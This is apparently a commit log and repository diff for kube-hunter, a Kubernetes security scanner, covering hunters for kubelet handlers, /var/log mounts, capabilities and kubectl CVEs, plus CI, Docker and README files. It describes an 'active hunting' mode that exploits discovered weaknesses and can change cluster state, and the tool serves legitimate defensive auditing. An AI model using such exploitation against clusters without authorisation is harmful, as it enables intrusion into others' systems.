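                handlers.remove((callback, once))

class OpenService:
    pass

queue = EventQueue()
queue.subscribe(OpenService, lambda e: print("hunting once"), once=True)
queue.publish(OpenService())  # triggers the hunter
queue.publish(OpenService())  # no duplicate hunting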
Tom Davidson
e3af42cbce Separate report "sending" into modules (#156)
* moved report output into dispatchers, stdout by default with config option of http(s)

* notes in arg config on how to configure http dispatcher

* removed some debug log visibility indicators

* missing import

* env vars more descriptive: KUBEHUNTER_HTTP_DISPATCH_METHOD and KUBEHUNTER_HTTP_DISPATCH_URL

* optimisation: delayed instantiation of the dispatcher until after selection to avoid instantiating unnecessarily

* refactor: config selection as per reporter selection

* bugfix: fall-back to default required if unknown reporter or dispatcher specified

* swapping urllib3 for requests

* corrected visibility levels for logging

* moving dispatchers into a file in reporters rather than its own place to fit with the theme and support dynamic module loading
2019-08-12 13:28:31 +03:00
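A hedged sketch of the dispatcher selection this PR introduces, keyed off the environment variables named above (simplified; the real module's structure may differ):

import os
import requests

class STDOUTDispatcher:
    def dispatch(self, report):
        print(report)

class HTTPDispatcher:
    def dispatch(self, report):
        url = os.environ["KUBEHUNTER_HTTP_DISPATCH_URL"]
        method = os.environ.get("KUBEHUNTER_HTTP_DISPATCH_METHOD", "POST")
        # requests.request lets the HTTP verb itself come from configuration
        requests.request(method, url, json={"report": report}, timeout=10)

def get_dispatcher(name="stdout"):
    dispatchers = {"stdout": STDOUTDispatcher, "http": HTTPDispatcher}
    # Fall back to the default when an unknown dispatcher is requested,
    # matching the bugfix bullet above.
    return dispatchers.get(name, STDOUTDispatcher)()

get_dispatcher("stdout").dispatch("example report")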
danielsagi
cb90673bcb Added API Server discovery when running as pod (#160)
* added an implementation for scanning api server from env variable, without duplications, when running as pod

* fixed issue with conversion of ip address
2019-08-05 13:25:06 -07:00
danielsagi
e5db8b6b28 New Hunter: /var/log mount (#158)
* added pods data on ExposedPodsHandler event, for later use

* added a /var/log write mount hunter in the 'mounts' module. also an active hunter which exploits the run handler as well

* removed unnecessary variables

* changed active hunter description

* minor changes to vulnerability descriptions
2019-08-01 20:17:57 +03:00
danielsagi
889a77d939 Pyinstaller/py2exe support (#157)
* removed unnecessary imports from main file

* added a script that generates static __init__ files based on existing modules

* added documentation

* added installing of plugins imports to script
2019-07-29 05:47:36 -07:00
danielsagi
91162297b3 Added System Logs Hunting & Improved Kubelet Hunting (#154)
* 1. added /logs Active hunter and tester.
2. changed kubelet handlers enum to be accessible as KubeletHandlers
3. added kubelet requests session to the event chain, for active hunters to use.

* added usage of event.session in the run active hunter
2019-07-10 14:57:25 +03:00
danielsagi
07db108511 Added pprof cmdline hunting (#150)
* added pprof/cmdline debug handler hunting on kubelet

* changed Name and Component of vuln

* removed preceding slash

* added verify=False
2019-07-10 11:37:26 +01:00
danielsagi
e4678843c9 Changed kubelet run handler test to not be a state-changing operation (#136)
* changed kubelet run handler test to not be state-changing

* changed fake_container name to be more random

* changed run handler to GET and check for method not allowed
2019-07-10 11:29:15 +01:00
danielsagi
cc70c83ba4 Retire Support For Python 2 (#153)
* removed python2 from readme and travis

* changed except on caps hunter to except PermissionError, which is supported only in python3

* removed python2 support in main file

* changed cvehunter to use res.text in place of res.content (python3 returns a bytes object for content)
2019-07-10 11:23:08 +01:00
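The distinction behind that last bullet: under Python 3, a requests response's .content is bytes while .text is a decoded str (small illustration):

import requests

response = requests.get("https://example.com", timeout=5)

assert isinstance(response.content, bytes)  # raw payload
assert isinstance(response.text, str)       # decoded via the response encoding

# Substring checks and .split() on the body therefore want .text in Python 3.
print("Example Domain" in response.text)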
danielsagi
911ec5eaf1 changed legacy host:port format to be 'location' in collector (#147) 2019-07-08 09:46:59 +01:00
danielsagi
5883e28971 Added new hunter for Capabilities (#146)
* added hunter for Capabilities, and a check for NET_RAW

* changed to Hunter from Discovery

* added description for hunter

* changed from PermissionError on net_raw check. for python2 support

* Clarify vulnerability description

Stating that this vulnerability only becomes a problem if a pod gets compromised
2019-07-04 12:39:41 +03:00
danielsagi
5185f28fff Added event filtering mechanism (#134)
* added event filtering mechanism, as well as a detailed explanation in src/README

* changed filter search to run only once for each event, also now returning None to indicate keeping of event

* expanded explanation of filtering in readme

* Tiny typo

* made changes for better readability, also filter should now return  None to indicate throwing of event

* changed apply filters loop to be simple and running on each publish.

* changed README

* added reassigning of the parent event after filters

* moved event filtering to another function, now supporting throwing of an event mid-loop

* added note in README about event.previous

* Tiny text corrections

* More accurate comment

"Throwing an event" can actually mean triggering it (which is different from "throwing it _away_"). But I went for "discarded" here to be completely clear

* Remove superfluous space that had crept in
2019-07-03 11:52:42 +01:00
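A hedged sketch of the filtering contract this entry converges on: a filter may return the (possibly modified) event to keep it, or None to discard it (names are illustrative):

class Event:
    def __init__(self, host):
        self.host = host

def ignore_ips_filter(event, ignored=frozenset({"10.0.0.1"})):
    # Returning None discards the event; returning it (modified or not) keeps it.
    return None if event.host in ignored else event

def apply_filters(event, filters):
    for filter_func in filters:
        event = filter_func(event)
        if event is None:
            return None  # the event was thrown away mid-loop
    return event

print(apply_filters(Event("10.0.0.1"), [ignore_ips_filter]))       # None
print(apply_filters(Event("10.0.0.9"), [ignore_ips_filter]).host)  # 10.0.0.9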
Weston Steimel
0caecd60ed optimised docker image (#123)
* optimised docker image

* use multi-stage image to remove build dependencies from final layer
* updated to python 3.7.3

Signed-off-by: Weston Steimel <weston.steimel@gmail.com>

* add /etc/ethertypes in final layer

Added ebtables and copied /etc/ethertypes to disable a warning in versions of
scapy with EtherCat functionality. This also fixes the misspelling of the
tcpdump package in the build layer.

Signed-off-by: Weston Steimel <weston.steimel@gmail.com>
2019-07-03 08:48:03 +01:00
danielsagi
049453ee15 changed run handler check to include all 4xx status codes (#142) 2019-06-27 09:55:56 +01:00
danielsagi
b2d2f5a01a New kubectl CVE hunter, detecting CVE-2019-11246 and CVE-2019-1002101 (#141)
* added a new hunter for CVE-2019-11246

* added KubectlClient component

* overrode the location function on the event to display a 'local machine' location

* added clarification about kubectl version --client operation

* Fix tiny typo

It reads better without the comma

* removed unnecessary debug message

* added CVE hunter for kubectl to allow more CVE checking.
2019-06-27 09:51:18 +01:00
danielsagi
f360c541ff Minor improve of task counting of queue (#139)
* changed the way of task handling to be safer. also added info about cases when one task is hanging

* removed queue_lock
2019-06-27 09:36:31 +01:00
Liz Rice
b5bf168938 Merge pull request #140 from danielsagi/show_vulnerabilities_without_services
Added printing vulnerabilities in case of no services on PlainReporter
2019-06-25 12:55:34 +01:00
Daniel Sagi
b7bcdd09cf better way of treating the printing, concatenating output 2019-06-24 22:42:03 +03:00
Daniel Sagi
1baca77754 Up until now, if services were not discovered, vulnerabilities would not have been shown. We want to show them in any case. 2019-06-24 20:00:28 +03:00
Liz Rice
f9c001ddea Merge pull request #137 from aquasecurity/add_exception_messages
More detailed explanation about exceptions
2019-06-13 06:01:26 -07:00
Daniel Sagi
50ea9a2405 added more detailed explanation about exceptions in debug 2019-06-12 17:43:16 +03:00
danielsagi
e04e84cc16 Merge pull request #135 from aquasecurity/fix_get_random_pod
Fixed not finding open debug handlers
2019-06-11 18:11:12 +03:00
danielsagi
30121b5010 Merge branch 'master' into fix_get_random_pod 2019-06-11 17:53:13 +03:00
danielsagi
c338aae1d6 Merge pull request #117 from aquasecurity/insecure_port
Insecure port for api server
2019-06-11 17:49:59 +03:00
danielsagi
ec3aca9547 Merge branch 'master' into insecure_port 2019-06-11 17:43:14 +03:00
Daniel Sagi
faf1db3d16 cleaned files to match master branch updates, also removed change of ExposedRunHandler evidence handling 2019-06-11 17:40:44 +03:00
Daniel Sagi
2168180ffb fixed issue with get_random_pod method; the .next attribute on generators was removed in python3 2019-06-11 11:29:39 +03:00
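The Python 3 change behind this fix, in miniature: generators lost their .next() method, and the built-in next() replaces it:

pods = (f"pod-{i}" for i in range(2))

# pods.next()  # Python 2 style: AttributeError under Python 3

print(next(pods))        # pod-0
print(next(pods, None))  # pod-1; the default guards against StopIteration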
danielsagi
079062573e Merge pull request #133 from nshauli/add_counter_to_privileged_container_evidence
Add evidence counter to privileged container vulnerability
2019-06-05 11:56:48 +03:00
nshauli
ac77c67ddd Add evidence counter to privileged container vulnerability 2019-06-05 11:48:25 +03:00
danielsagi
0f4ddc9987 Merge pull request #132 from aquasecurity/add_environment_markers
changed enum34 to be installed only under python versions below 3.4
2019-06-03 20:45:03 +03:00
Daniel Sagi
9204d34244 changed enum34 to be installed only under python versions below 3.4 2019-06-03 20:16:39 +03:00
danielsagi
9629292ef8 Merge pull request #130 from nshauli/add_hunter_name_to_vulnerability
Add hunter name to each event and each reported vulnerability
2019-06-03 16:26:56 +03:00
nshauli
f5c54428f8 Add hunter name to each event and to each vulnerability in json and yaml report 2019-06-03 16:17:33 +03:00
Liz Rice
1143b89332 Merge branch 'master' into insecure_port 2019-05-30 23:26:16 +01:00
Liz Rice
b60cdf2043 Merge pull request #128 from DrMurx/more_secure_cloudip_detection
Access cloud IP detection service via HTTPS
2019-05-30 23:24:31 +01:00
Liz Rice
8fad9dd2ac Merge branch 'master' into more_secure_cloudip_detection 2019-05-30 23:20:41 +01:00
danielsagi
c6673869d7 Merge pull request #129 from aquasecurity/add_enum_to_requirements
added enum34 to requirements.txt
2019-05-25 20:43:55 +03:00
Daniel Sagi
55ed8d0a80 added enum34 to requirements.txt 2019-05-25 20:00:55 +03:00
Jan Kunzmann
0f3670dff5 Access cloud IP detection service via HTTPS 2019-05-23 13:03:18 +02:00
danielsagi
e69e591fab Merge pull request #125 from aquarnd/hunter_statistics_should_count_vulnerabilities_only
1. Change hunter statistics to count vulnerabilities only.
2019-05-21 19:12:13 +03:00
nshauli
ac7027dab6 1. Change hunter statistics to count vulnerabilities only.
2. Add --statistics flag support.
3. Show hunter statistics only if --statistics was set.
4. Few infrastructure improvements.
2019-05-20 21:32:52 +03:00
Liz Rice
d7014fd06d Merge pull request #121 from tomek-bt/update-readme-for-non-ssh
Update README to reference non-SSH URL
2019-05-18 09:44:44 +01:00
Tomek Rabczak
e536f53b88 Update README to reference non-SSH URL 2019-05-17 17:44:42 +00:00
Liz Rice
f7eccca55d Merge pull request #119 from aquasecurity/security-fix
CVE-2019-11324
2019-05-14 15:23:44 +01:00
Liz Rice
d6f76dc295 CVE-2019-11324 2019-05-14 15:15:11 +01:00
Liz Rice
229ff40a01 Fix bad merge
And a typo while I'm here
2019-05-14 14:07:33 +01:00
Liz Rice
7d038f50dc Merge branch 'master' into insecure_port 2019-05-14 12:00:51 +01:00
Liz Rice
c860406075 Merge pull request #116 from aquarnd/add_suppport_for_hunters_list
Add support for hunters list as part of the reports.
2019-05-14 11:55:40 +01:00
nshauli
b4df6b5298 Add support for hunters list as part of the reports.
Each reported hunter includes name, description and number of events.
Add severity field to each vulnerability report.
2019-05-14 12:44:30 +03:00
Liz Rice
50dfbd0daa Update requirements.txt 2019-05-13 13:52:51 +01:00
Liz Rice
5cf68a318f Tests for insecure port access 2019-05-13 13:18:03 +01:00
Liz Rice
fd5ed8a166 .gitignore additions 2019-05-13 12:26:22 +01:00
Liz Rice
1db39fd966 Include evidence on exposed run handler 2019-05-13 12:24:28 +01:00
Liz Rice
bfb14e229a Combine two debug messages, for clarity 2019-05-13 12:23:53 +01:00
Liz Rice
da832df36d Test for insecure port being open on port 8080 2019-05-13 12:23:23 +01:00
161 changed files with 8374 additions and 2783 deletions

4
.dockerignore Normal file

@@ -0,0 +1,4 @@
*.png
tests/
docs/
.github/

6
.flake8 Normal file

@@ -0,0 +1,6 @@
[flake8]
ignore = E203, E266, E501, W503, B903, T499
max-line-length = 120
max-complexity = 18
select = B,C,E,F,W,B9,T4
mypy_config=mypy.ini

17
.github/ISSUE_TEMPLATE/bug_report.md vendored Normal file

@@ -0,0 +1,17 @@
---
name: Bug report
about: I would like to report a bug within the project
labels: bug
---
### What happened
<!---
Please explain in detail steps you took and what happened.
-->
### Expected behavior
<!---
What should happen, ideally?
-->


@@ -0,0 +1,17 @@
---
name: Feature Request
about: I have a suggestion (and might want to implement myself)
labels: enhancement
---
## What would you like to be added
<!---
Please describe the idea you have and the problem you are trying to solve.
-->
## Why is this needed
<!---
Please explain why is this feature needed and how it improves the project.
-->


@@ -0,0 +1,23 @@
---
name: Support Question
about: I have a question and require assistance
labels: question
---
<!--
If you have some trouble, feel free to ask.
Make sure you're not asking a duplicate question by searching the issues list.
-->
## What are you trying to achieve
<!--
Explain the problem you are experiencing.
-->
## Minimal example (if applicable)
<!--
If it is possible, create a minimal example of your work that showcases
the problem you are having.
-->

36
.github/PULL_REQUEST_TEMPLATE.md vendored Normal file

@@ -0,0 +1,36 @@
<!---
Thank you for contributing to Aqua Security.
Please don't remove the template.
-->
## Description
Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.
## Contribution Guidelines
Please read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
## Fixed Issues
Please mention any issues fixed in the PR by referencing it properly in the commit message.
As per the convention, use appropriate keywords such as `fixes`, `closes`, `resolves` to automatically refer the issue.
Please consult [official github documentation](https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords) for details.
Fixes #(issue)
## "BEFORE" and "AFTER" output
To verify that the change works as desired, please include an output of terminal before and after the changes under headings "BEFORE" and "AFTER".
### BEFORE
Any Terminal Output Before Changes.
### AFTER
Any Terminal Output After Changes.
## Contribution checklist
- [ ] I have read the Contributing Guidelines.
- [ ] The commits refer to an active issue in the repository.
- [ ] I have added automated testing to cover this case.
## Notes
Please mention if you have not checked any of the above boxes.

67
.github/workflows/codeql-analysis.yml vendored Normal file

@@ -0,0 +1,67 @@
# For most projects, this workflow file will not need changing; you simply need
# to commit it to your repository.
#
# You may wish to alter this file to override the set of languages analyzed,
# or to provide custom queries or build logic.
#
# ******** NOTE ********
# We have attempted to detect the languages in your repository. Please check
# the `language` matrix defined below to confirm you have the correct set of
# supported CodeQL languages.
#
name: "CodeQL"
on:
  push:
    branches: [ master ]
  pull_request:
    # The branches below must be a subset of the branches above
    branches: [ master ]
  schedule:
    - cron: '16 3 * * 1'

jobs:
  analyze:
    name: Analyze
    runs-on: ubuntu-latest

    strategy:
      fail-fast: false
      matrix:
        language: [ 'python' ]
        # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ]
        # Learn more:
        # https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      # Initializes the CodeQL tools for scanning.
      - name: Initialize CodeQL
        uses: github/codeql-action/init@v1
        with:
          languages: ${{ matrix.language }}
          # If you wish to specify custom queries, you can do so here or in a config file.
          # By default, queries listed here will override any specified in a config file.
          # Prefix the list here with "+" to use these queries and those in the config file.
          # queries: ./path/to/local/query, your-org/your-repo/queries@main

      # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
      # If this step fails, then you should remove it and run the build manually (see below)
      - name: Autobuild
        uses: github/codeql-action/autobuild@v1

      # Command-line programs to run using the OS shell.
      # 📚 https://git.io/JvXDl
      # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
      # and modify them (or add more) to build your code if your project
      # uses a compiled language
      #- run: |
      #   make bootstrap
      #   make release

      - name: Perform CodeQL Analysis
        uses: github/codeql-action/analyze@v1

12
.github/workflows/lint.yml vendored Normal file

@@ -0,0 +1,12 @@
name: Lint

on: [push, pull_request]

jobs:
  build:
    runs-on: ubuntu-20.04
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-python@v2
      - uses: pre-commit/action@v2.0.0

52
.github/workflows/release.yml vendored Normal file

@@ -0,0 +1,52 @@
on:
  push:
    # Sequence of patterns matched against refs/tags
    tags:
      - 'v*' # Push events to matching v*, i.e. v1.0, v20.15.10

name: Upload Release Asset

jobs:
  build:
    name: Upload Release Asset
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: '3.9'
      - name: Install dependencies
        run: |
          python -m pip install -U pip
          python -m pip install -r requirements-dev.txt
      - name: Build project
        shell: bash
        run: |
          make pyinstaller
      - name: Create Release
        id: create_release
        uses: actions/create-release@v1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          tag_name: ${{ github.ref }}
          release_name: Release ${{ github.ref }}
          draft: false
          prerelease: false
      - name: Upload Release Asset
        id: upload-release-asset
        uses: actions/upload-release-asset@v1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          upload_url: ${{ steps.create_release.outputs.upload_url }}
          asset_path: ./dist/kube-hunter
          asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
          asset_content_type: application/octet-stream

54
.github/workflows/test.yml vendored Normal file

@@ -0,0 +1,54 @@
name: Test

on: [push, pull_request]

env:
  FORCE_COLOR: 1

jobs:
  build:
    runs-on: ${{ matrix.os }}
    strategy:
      fail-fast: false
      matrix:
        python-version: ["3.6", "3.7", "3.8", "3.9"]
        os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]
    steps:
      - uses: actions/checkout@v2
      - name: Set up Python ${{ matrix.python-version }}
        uses: actions/setup-python@v2
        with:
          python-version: ${{ matrix.python-version }}
      - name: Get pip cache dir
        id: pip-cache
        run: |
          echo "::set-output name=dir::$(pip cache dir)"
      - name: Cache
        uses: actions/cache@v2
        with:
          path: ${{ steps.pip-cache.outputs.dir }}
          key:
            ${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
          restore-keys: |
            ${{ matrix.os }}-${{ matrix.python-version }}-
      - name: Install dependencies
        run: |
          python -m pip install -U pip
          python -m pip install -U wheel
          python -m pip install -r requirements.txt
          python -m pip install -r requirements-dev.txt
      - name: Test
        shell: bash
        run: |
          make test
      - name: Upload coverage
        uses: codecov/codecov-action@v1
        with:
          name: ${{ matrix.os }} Python ${{ matrix.python-version }}

32
.gitignore vendored

@@ -1,3 +1,33 @@
 *.pyc
+.dockerignore
+.venv
+*aqua*
 venv/
+.vscode
+.coverage
 .idea
+
+# Distribution / packaging
+.Python
+env/
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+*.egg-info/
+.installed.cfg
+*.egg
+*.spec
+.eggs
+pip-wheel-metadata
+
+# Directory Cache Files
+.DS_Store
+thumbs.db
+__pycache__
+.mypy_cache

10
.pre-commit-config.yaml Normal file

@@ -0,0 +1,10 @@
repos:
  - repo: https://github.com/psf/black
    rev: stable
    hooks:
      - id: black
  - repo: https://gitlab.com/pycqa/flake8
    rev: 3.7.9
    hooks:
      - id: flake8
        additional_dependencies: [flake8-bugbear]

26
.travis.yml

@@ -1,26 +0,0 @@
group: travis_latest
language: python
cache: pip
matrix:
  include:
    - python: 2.7
    #- python: 3.4
    #- python: 3.5
    - python: 3.6
    - python: 3.7
      dist: xenial # required for Python 3.7 (travis-ci/travis-ci#9069)
      # sudo: required # required for Python 3.7 (travis-ci/travis-ci#9069)
install:
  - pip install -r requirements.txt
  - pip install flake8
before_script:
  # stop the build if there are Python syntax errors or undefined names
  - flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
  # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
  - flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
  - pip install pytest
script:
  - python runtest.py
notifications:
  on_success: change
  on_failure: change # `always` will be the setting once code changes slow down

39
CONTRIBUTING.md Normal file

@@ -0,0 +1,39 @@
## Contribution Guide
## Welcome Aboard
Thank you for taking interest in contributing to kube-hunter!
This guide will walk you through the development process of kube-hunter.
## Setting Up
kube-hunter is written in Python 3 and supports versions 3.6 and above.
You'll probably want to create a virtual environment for your local project.
Once you've got your project and IDE set up, you can `make dev-deps` and start contributing!
You may also install a pre-commit hook to take care of linting - `pre-commit install`.
## Issues
- Feel free to open issues for any reason as long as you make it clear if this issue is about a bug/feature/hunter/question/comment.
- Please spend a small amount of time giving due diligence to the issue tracker. Your issue might be a duplicate. If it is, please add your comment to the existing issue.
- Remember users might be searching for your issue in the future, so please give it a meaningful title to help others.
- The issue should clearly explain the reason for opening, the proposal if you have any, and any relevant technical information.
## Pull Requests
1. Every Pull Request should have an associated Issue unless you are fixing a trivial documentation issue.
1. Your PR is more likely to be accepted if it focuses on just one change.
1. Describe what the PR does. There's no convention enforced, but please try to be concise and descriptive. Treat the PR description as a commit message. Titles that start with "fix"/"add"/"improve"/"remove" are good examples.
1. Please add the associated Issue in the PR description.
1. There's no need to add or tag reviewers.
1. If a reviewer commented on your code or asked for changes, please remember to mark the discussion as resolved after you address it. PRs with unresolved issues should not be merged (even if the comment is unclear or requires no action from your side).
1. Please include a comment with the results before and after your change.
1. Your PR is more likely to be accepted if it includes tests (We have not historically been very strict about tests, but we would like to improve this!).
## Hunters
If you are contributing a new Hunter:
1. When you open an issue to present the Hunter, please specify which `Vulnerability` classes you plan to add.
1. A maintainer will assign each `Vulnerability` a VID for you to include in your Hunter code.
1. Please add a KB article to `/docs/kb/` explaining the vulnerability and suggesting remediation steps. Look at other articles for examples.
1. Please adhere to the following types convention: Use `Hunter` class to report vulnerabilities, `ActiveHunter` if your Hunter might change the state of the cluster, and `Discovery` for scanning the cluster (all are descendants of `HunterBase`). Also, use the `Vulnerability` class to report findings, and `Service` to report a discovery to be used by a hunter (both are descendants of `Event`, refrain from using `Event` directly).
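To make the convention concrete, here is a hedged sketch of a minimal passive Hunter pair (the import paths and signatures follow the project's general layout but should be treated as assumptions, and KHV000 is a placeholder VID):

from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Service, Vulnerability
from kube_hunter.core.types import Hunter, InformationDisclosure, KubernetesCluster

class ExampleService(Service, Event):
    """Emitted by a Discovery module when the example service is found."""
    def __init__(self):
        Service.__init__(self, name="Example Service")

class ExampleDisclosure(Vulnerability, Event):
    """The finding this hunter reports."""
    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            component=KubernetesCluster,
            name="Example Information Disclosure",
            category=InformationDisclosure,
            vid="KHV000",  # placeholder; a maintainer assigns the real VID
        )
        self.evidence = evidence

@handler.subscribe(ExampleService)
class ExampleHunter(Hunter):
    """Checks a discovered example service for the weakness."""
    def __init__(self, event):
        self.event = event

    def execute(self):
        self.publish_event(ExampleDisclosure(evidence="demo evidence"))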

Dockerfile

@@ -1,16 +1,29 @@
-FROM python:3.7.2-alpine3.9
+FROM python:3.8-alpine as builder

-RUN apk add --update \
+RUN apk add --no-cache \
     linux-headers \
-    build-base \
-    tcpdump \
-    wireshark
+    build-base \
+    ebtables \
+    make \
+    git && \
+    apk upgrade --no-cache

-RUN mkdir -p /kube-hunter
-COPY ./requirements.txt /kube-hunter/.
-RUN pip install -r /kube-hunter/requirements.txt
-COPY . /kube-hunter
-
 WORKDIR /kube-hunter
-
-ENTRYPOINT ["python", "kube-hunter.py"]
+COPY setup.py setup.cfg Makefile ./
+RUN make deps
+COPY . .
+RUN make install
+
+FROM python:3.8-alpine
+RUN apk add --no-cache \
+    tcpdump \
+    ebtables && \
+    apk upgrade --no-cache
+
+COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
+COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter
+
+ENTRYPOINT ["kube-hunter"]

67
Makefile Normal file

@@ -0,0 +1,67 @@
.SILENT: clean

NAME := kube-hunter
SRC := kube_hunter
ENTRYPOINT := $(SRC)/__main__.py
DIST := dist
COMPILED := $(DIST)/$(NAME)
STATIC_COMPILED := $(COMPILED).static

.PHONY: deps
deps:
	requires=$(shell mktemp) ;\
	python setup.py -q dependencies > $$requires ;\
	pip install -r $$requires ;\
	rm $$requires

.PHONY: dev-deps
dev-deps:
	pip install -r requirements-dev.txt

.PHONY: lint
lint:
	black .
	flake8

.PHONY: lint-check
lint-check:
	flake8
	black --check --diff .

.PHONY: test
test:
	pytest

.PHONY: build
build:
	python setup.py sdist bdist_wheel

.PHONY: pyinstaller
pyinstaller: deps
	python setup.py pyinstaller

.PHONY: staticx_deps
staticx_deps:
	command -v patchelf > /dev/null 2>&1 || (echo "patchelf is not available. install it in order to use staticx" && false)

.PHONY: pyinstaller_static
pyinstaller_static: staticx_deps pyinstaller
	staticx $(COMPILED) $(STATIC_COMPILED)

.PHONY: install
install:
	pip install .

.PHONY: uninstall
uninstall:
	pip uninstall $(NAME)

.PHONY: publish
publish:
	twine upload dist/*

.PHONY: clean
clean:
	rm -rf build/ dist/ *.egg-info/ .eggs/ .pytest_cache/ .mypy_cache .coverage *.spec
	find . -type d -name __pycache__ -exec rm -rf '{}' +

136
README.md

@@ -1,116 +1,182 @@
![kube-hunter](https://github.com/aquasecurity/kube-hunter/blob/master/kube-hunter.png)
[![Build Status](https://travis-ci.org/aquasecurity/kube-hunter.svg?branch=master)](https://travis-ci.org/aquasecurity/kube-hunter)
[![Build Status](https://github.com/aquasecurity/kube-hunter/workflows/Test/badge.svg)](https://github.com/aquasecurity/kube-hunter/actions)
[![codecov](https://codecov.io/gh/aquasecurity/kube-hunter/branch/master/graph/badge.svg)](https://codecov.io/gh/aquasecurity/kube-hunter)
[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
[![License](https://img.shields.io/github/license/aquasecurity/kube-hunter)](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE)
[![Docker image](https://images.microbadger.com/badges/image/aquasec/kube-hunter.svg)](https://microbadger.com/images/aquasec/kube-hunter "Get your own image badge on microbadger.com")
Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster you don't own!**
**Run kube-hunter**: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com) where you can register online to receive a token allowing you see and share the results online. You can also run the Python code yourself as described below.
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your own modules please read [Guidelines For Developing Your First kube-hunter Module](src/README.md).
kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster that you don't own!**
**Run kube-hunter**: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com) where you can register online to receive a token allowing you to see and share the results online. You can also run the Python code yourself as described below.
**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
[![kube-hunter demo video](https://github.com/aquasecurity/kube-hunter/blob/master/kube-hunter-screenshot.png)](https://youtu.be/s2-6rTkH8a8?t=57s)
Table of Contents
=================
* [Hunting](#hunting)
* [Where should I run kube-hunter?](#where-should-i-run-kube-hunter)
* [Scanning options](#scanning-options)
* [Active Hunting](#active-hunting)
* [List of tests](#list-of-tests)
* [Nodes Mapping](#nodes-mapping)
* [Output](#output)
* [Dispatching](#dispatching)
* [Deployment](#deployment)
* [On Machine](#on-machine)
* [Prerequisites](#prerequisites)
* [Container](#container)
* [Pod](#pod)
* [Contribution](#contribution)
## Hunting
### Where should I run kube-hunter?
There are three different ways to run kube-hunter, each providing a different approach to detecting weaknesses in your cluster:
1. Run kube-hunter on any machine (including your laptop), select Remote scanning, and give the IP address or domain name of your Kubernetes cluster. This will give you an attacker's-eye view of your Kubernetes setup.
2. Run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
3. Run kube-hunter in a pod within the cluster. This indicates how exposed your cluster would be if one of your application pods is compromised (through a software vulnerability, for example).
### Scanning options
First, check the **[prerequisites](#prerequisites)**.
By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
1. **Remote scanning**
To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
`kube-hunter --remote some.node.com`
2. **Interface scanning**
To specify interface scanning, use the `--interface` option (this will scan all of the machine's network interfaces). Example:
`kube-hunter --interface`
3. **Network scanning**
To scan a specific CIDR, use the `--cidr` option. Example:
`kube-hunter --cidr 192.168.0.0/24`
### Active Hunting
Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities.
The main difference between normal and active hunting is that a normal hunt will never change the state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.
By default, kube-hunter does not do active hunting. To actively hunt a cluster, use the `--active` flag. Example:
`kube-hunter --remote some.domain.com --active`
### List of tests
You can see the list of tests with the `--list` option. Example:
`kube-hunter --list`
To see active hunting tests as well as passive:
`kube-hunter --list --active`
### Nodes Mapping
To see only a mapping of your nodes' network, run with the `--mapping` option. Example:
`kube-hunter --cidr 192.168.0.0/24 --mapping`
This will output all the Kubernetes nodes kube-hunter has found.
### Output
To control logging, you can specify a log level, using the `--log` option. Example:
`kube-hunter --active --log WARNING`
Available log levels are:
* DEBUG
* INFO (default)
* WARNING
### Dispatching
By default, the report will be dispatched to `stdout`, but you can specify different methods by using the `--dispatch` option. Example:
`kube-hunter --report json --dispatch http`
Available dispatch methods are:
* stdout (default)
* http (to configure, set the following environment variables):
* KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
* KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
